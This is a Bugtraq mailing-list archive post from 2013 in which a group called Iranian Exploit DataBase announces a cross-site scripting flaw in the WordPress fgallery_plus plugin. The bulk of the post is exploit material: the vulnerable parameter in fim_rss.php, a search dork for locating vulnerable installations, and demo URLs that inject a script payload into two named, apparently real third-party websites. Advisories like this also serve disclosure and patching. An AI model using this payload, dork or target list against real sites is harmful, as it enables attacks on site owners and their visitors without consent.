Bugtraq mailing list archives

Wordpress fgallery_plus Plugin Xss vulnerabilities

From: iedb.team () gmail com
Date: Sat, 21 Sep 2013 15:26:30 GMT

#################################

#          Iranian Exploit DataBase Forum

#               http://iedb.ir/acc

#                 http://iedb.ir

#################################

# Exploit Title : Wordpress fgallery_plus Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team () Gmail com

# Home : http://iedb.ir   -   http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/plugins/fgallery_plus/

#################################

# Exploit :

# http://site.com/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]

# Dem0 :

# http://allanmc.dk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3";><script>alert(/IeDb.Ir/)</script>

# http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3";><script>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - FÃ&#65533;ï¿½Ã&#65533;Â±Ã&#65533;ï¿½Ã¯Â¿Â½iD - Medrik - 
Dj.TiniVini - dr.koderz - z3r0 - Mr Zer0

# B3hz4d - C0dex -  Behnam Vanda - ErfanMs - E2MA3N - S!Y0U.T4r.6T - 
Ã&#65533;ï¿½Ã¯Â¿Â½Ã&#65533;ï¿½Ã&#65533;Â¿4Ã&#65533;ï¿½Ã¯Â¿Â½Ã&#65533;ï¿½Ã¯Â¿Â½ 
Ã&#65533;ï¿½Ã&#65533;Â¦3Ã&#65533;ï¿½Ã&#65533;Â¿Ã&#65533;ï¿½Ã&#65533;Â¿ - 0x0ptim0us - ARTA

#                   & All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-584.html

#################################

Current thread:

Wordpress fgallery_plus Plugin Xss vulnerabilities iedb . team (Sep 22)
- <Possible follow-ups>
- Wordpress fgallery_plus Plugin Xss vulnerabilities iedb . team (Sep 23)
- Wordpress fgallery_plus Plugin Xss vulnerabilities iedb . team (Sep 23)